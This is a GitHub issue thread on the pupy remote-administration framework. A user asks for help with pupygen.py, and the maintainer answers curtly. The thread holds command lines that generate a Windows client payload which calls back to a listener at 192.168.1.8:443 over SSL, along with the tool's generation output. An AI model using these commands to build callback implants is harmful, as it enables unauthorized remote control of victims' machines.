### ISSUE TITLE
pupy error 

### ISSUE THREAD

**Issue by hughpen15** [n1nj4sec/pupy#359]
:~/pupy.lel/pupy#  ./pupygen.py -f exe_x64 -o huehue.exe connect --host 192.168.1.8:444
usage: pupygen.py [-h]
                  [-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky}]
                  [-O {android,windows,linux}] [-A {x86,x64}] [-S] [-o OUTPUT]
                  [-D OUTPUT_DIR] [-s SCRIPTLET] [-l] [-E] [--no-use-proxy]
                  [--ps1-oneliner-listen-port PS1_ONELINER_LISTEN_PORT]
                  [--randomize-hash] [--debug-scriptlets] [--debug]
                  [--workdir WORKDIR]
                  [{bind,auto_proxy,dnscnc,connect}] ...
pupygen.py: error: argument -f/--format: invalid choice: 'exe_x64' (choose from 'client', 'py', 'pyinst', 'py_oneliner', 'ps1', 'ps1_oneliner', 'rubber_ducky')

What wrong and what should i do?

**Comment by n1nj4sec** [comment]
read the error, use your brain, and understand what's wrong. Everything is written and the error message even suggest you a valid list of arguments ! I think at this point nobody can help you if you can't help yourself

**Comment by hughpen15** [comment]
so i changed 'exe_x64' to 'client' and this came out
~/pupy.lel/pupy# ./pupygen.py -f client -o cunt.exe --randomize-hash connect --host 192.168.1.8:443 --transport ssl
[+] Generate client: windows/x86
[C] launcher: connect
[C] launcher_args: ['--host', '192.168.1.8:443', '--transport', 'ssl']
[C] offline_script: 
#6eEkFbxCC9H9m2nAec4DOkHxJGwbNN5Wn6s3WRDY
